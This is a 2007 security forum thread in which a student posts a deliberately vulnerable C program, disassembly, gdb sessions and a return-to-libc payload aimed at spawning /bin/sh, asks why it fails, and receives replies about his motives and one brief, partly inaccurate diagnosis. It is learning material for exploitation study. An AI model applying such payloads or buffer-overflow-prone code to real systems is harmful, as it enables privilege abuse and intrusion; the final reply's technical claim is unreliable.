-
July 19th, 2007, 09:38 PM
#1
Junior Member
Problem with simple return-to-libc exploit.
Im experimenting with some basic exploits and need some help.
Here is the standard issue code - exploit.c :
Code:
#include <stdio.h>
#include <string.h>
int main(int argc, char *argv[])
{
char buffer[5];
//buffer[0] = 1;
//buffer[5] = 0;
strcpy(buffer, argv[1]);
return 0;
}
It will be obvious what im trying to do, but ill explain anyway.
I want to craft a buffer and feed it to ./exploit so that the call to strcpy() will overwrite the stack frame belonging to main, and execution can be redirected to the system() call in libc.
Here are the steps I have taken.
I want system() to spawn me a shell so I need to pass it the argument "/bin/sh", which i've stored in an enviroment variable:
And written a simple program to return the address of the variable in memory using the getenv() function :
$ ./getenv BINSH
BINSH @ 0xbffffc86
To find the address of system() ive used used gdb:
Note that address space randomization has been turned off.
$ gdb -q exploit
Using host libthread_db library "/lib/libthread_db.so.1".
(gdb) run aaaa
Starting program: ........../exploit aaaa
Program exited normally.
(gdb) p system
$1 = {<text variable, no debug info>} 0xb7ede030 <system>
(gdb) quit
To find out how much garbage to put at the start of the buffer I looked at the output from gcc - exploit.s :
Code:
.file "exploit.c"
.text
.globl main
.type main, @function
main:
leal 4(%esp), %ecx
andl $-16, %esp
pushl -4(%ecx)
pushl %ebp
movl %esp, %ebp
pushl %ecx
subl $36, %esp
movl 4(%ecx), %eax
addl $4, %eax
movl (%eax), %eax
movl %eax, 4(%esp)
leal -9(%ebp), %eax
movl %eax, (%esp)
call strcpy
movl $0, %eax
addl $36, %esp
popl %ecx
popl %ebp
leal -4(%ecx), %esp
ret
.size main, .-main
.ident "GCC: (GNU) 4.1.2 (Gentoo 4.1.2)"
.section .note.GNU-stack,"",@progbits
It looks as though buffer[0] is located 9 bytes from the saved frame pointer. I execute the exploit code with a crafted buffer as follows:
$ ./exploit `perl -e 'print "A"x13 . "\x30\xe0\xed\xb7AAAA\x86\xfc\xff\xbf";'`
Segmentation fault
......nothing. No new shell.
Despite the fact I know that EIP is getting overwritten. According to gdb:
$ gdb -q exploit
Using host libthread_db library "/lib/libthread_db.so.1".
(gdb) disassemble main
Dump of assembler code for function main:
0x08048374 <main+0>: lea 0x4(%esp),%ecx
0x08048378 <main+4>: and $0xfffffff0,%esp
0x0804837b <main+7>: pushl 0xfffffffc(%ecx)
0x0804837e <main+10>: push %ebp
0x0804837f <main+11>: mov %esp,%ebp
0x08048381 <main+13>: push %ecx
0x08048382 <main+14>: sub $0x24,%esp
0x08048385 <main+17>: mov 0x4(%ecx),%eax
0x08048388 <main+20>: add $0x4,%eax
0x0804838b <main+23>: mov (%eax),%eax
0x0804838d <main+25>: mov %eax,0x4(%esp)
0x08048391 <main+29>: lea 0xfffffff7(%ebp),%eax
0x08048394 <main+32>: mov %eax,(%esp)
0x08048397 <main+35>: call 0x80482c0 <strcpy@plt>
0x0804839c <main+40>: mov $0x0,%eax
0x080483a1 <main+45>: add $0x24,%esp
0x080483a4 <main+48>: pop %ecx
0x080483a5 <main+49>: pop %ebp
0x080483a6 <main+50>: lea 0xfffffffc(%ecx),%esp
0x080483a9 <main+53>: ret
End of assembler dump.
(gdb) break *0x0804839c
Breakpoint 1 at 0x804839c
(gdb) run `perl -e 'print "A"x13 . "\x30\xe0\xed\xb7AAAA\x86\xfc\xff\xbf";'`
Starting program: ........./exploit `perl -e 'print "A"x13 . "\x30\xe0\xed\xb7AAAA\x86\xfc\xff\xbf";'`
Breakpoint 1, 0x0804839c in main ()
(gdb) info frame
Stack level 0, frame at 0xbffff230:
eip = 0x804839c in main; saved eip 0xb7ede030
Arglist at 0xbffff228, args:
Locals at 0xbffff228, Previous frame's sp is 0xfffffdb9
Saved registers:
ecx at 0xbffff224, ebp at 0xbffff228, eip at 0xbffff22c
(gdb)
So what am I doing wrong? Have I crafted the stack frame incorrectly? What am I missing?
Are you still reading?
Any insight or pointers in the right direction are greatly appreciated.
Here is some more information about my system that might be useful.
$ uname -a
Linux localhost 2.6.20-gentoo-r8 #1 Wed Jul 11 01:17:44 GMT 2007 i686 Mobile AMD Sempron(tm) Processor 3400+ AuthenticAMD GNU/Linux
$ gcc --version
gcc (GCC) 4.1.2 (Gentoo 4.1.2)
[/QUOTE]
-
July 19th, 2007, 10:02 PM
#2
My dear "Prince of the pudding race" (Rabbie Burns) I have allowed this post, on the grounds that we are a security site.
Sorry that I am not technically competent to answer your question
cheers
-
July 19th, 2007, 10:17 PM
#3
Before I answer or attempt to, can I ask from what viewpoint you are interested in exploits, to use them to gain system access or understand them to prevent?
-
July 20th, 2007, 10:08 AM
#4
Junior Member
Do you care?
I have no desire to learn, from you or anyone else here, how to break into peoples computers; Nor to understand exploits with a view to preventing them (as I never write code that appears in the public domain). I simply wish to understand these techniques.
No-one is going to gain root access with this exploit anyway (as system() drops privileges).
So please dont give me your right-of-passage question-and-answer-session bull***t. If you think i'm some nasty wannabe hacker(or whatever) who is going to try to do lots of nasty stuff, then simply dont post anything. I'll learn the techniques myself eventually, I just wondered if there might be any support out there, or anyone who shared an interest and wanted to engage in some intelligent discussion.
But please, dont post crap like that
-
July 20th, 2007, 10:45 AM
#5
Originally Posted by Haggis
Do you care?
Wouldn't of asked if I didnt!
Originally Posted by Haggis
But please, dont post crap like that
No prob, I won't.
-
July 20th, 2007, 10:49 AM
#6
Yes, strange though it might seem, we actually do..........
Believe it or not, we get so many "how do I hack my girlfriend's Hotmail account" or online Viagra adverts and all that crap..............
I made a personal decision that you were a genuine guy who would contribute to our forums........... please don't prove me wrong, and do lose the chip on your shoulder.
I have no desire to learn, from you or anyone else here
Why did you join then?
If you cannot code, perhaps you should consider a career in selling icecream?
If you have no intellectual humility perhaps you should go elsewhere?
Up to you my "prince of the pudding race"
-
July 20th, 2007, 11:16 AM
#7
Originally Posted by nihil
do lose the chip on your shoulder.
Agreed!
You'll find people more willing to help then.
And from what I've seen - there are def people who can!
If you cannot code, perhaps you should consider a career in selling icecream?
Ha.
But I do agree with nihil - you seem to be genuinely interested, so an adjustment in attitude would really help.
-
July 20th, 2007, 11:27 AM
#8
I found the link below an interesting read, might help you.
[Edit] Link removed as I don't like posting in public forums. Check your PM.[/Edit]
Provided as a gesture of good faith!
-
July 20th, 2007, 04:22 PM
#9
Junior Member
I do beg your pardon, I may have been a bit quick off the mark. There was no need to respond like that and I apologize - if not for causing offence, then certainly for bringing down the intelligence of the forum.
Please do not quote me out of context, i'm sure you're well aware the point I was making - I have no desire to "Hack my Girlfriends Hotmail"(Incidently, we have quite a good relationship, and I am granted free access to her account for my own use ).
I am genuine. A student from Glasgow, studying a mixture of electronics and computer science. I have been programming for some time and have recently become interested in how programs are exploited, in particular how execution can be controlled and redirected. I have come accross a stumbling block however and required some help understanding. I thought this would be a good thread for people who are in the same position but didnt know who to ask, as I am aware the resources for this type of exploit go out of date quite quickly.
This is advertised as a "Security" forum with a section in particular, on "Programming Security". I would of thought the bulk of the discussion here would centre upon buffer overflows, format string exploits etc. which doesnt seem to be the case. Hence I have started a thread where hopefully, people with enough intelligence, will be able to follow a very basic (and relatively un-dangerous) exploit from start to finish. To that end then, I invite anyone with the knowledge and desire, to please contribute.
Thank you for the link WolfeTone. I have not yet looked at it but certainly will!
-
July 21st, 2007, 03:07 AM
#10
You don't have any shellcode or anything. You're just calling system() with no arguments. It needs a command to execute. You need to get the address of a string with the command you want on the stack before you call it. I've never seen anyone do it that way though. I've only seen people put the actual machine code to exec a shell in memory and have it return to that. I'm sure the link provided to you will give you a good understanding. Good luck.
Similar Threads
-
By gore in forum Operating Systems
Replies: 2
Last Post: February 25th, 2005, 08:12 AM
-
By valheru in forum Site Feedback/Questions/Suggestions
Replies: 14
Last Post: May 3rd, 2002, 10:31 PM
-
By Noble Hamlet in forum AntiOnline's General Chit Chat
Replies: 1100
Last Post: March 17th, 2002, 09:38 AM
-
By intruder in forum AntiOnline's General Chit Chat
Replies: 5
Last Post: February 26th, 2002, 03:48 AM
Posting Permissions
- You may not post new threads
- You may not post replies
- You may not post attachments
- You may not edit your posts
-
Forum Rules
|
|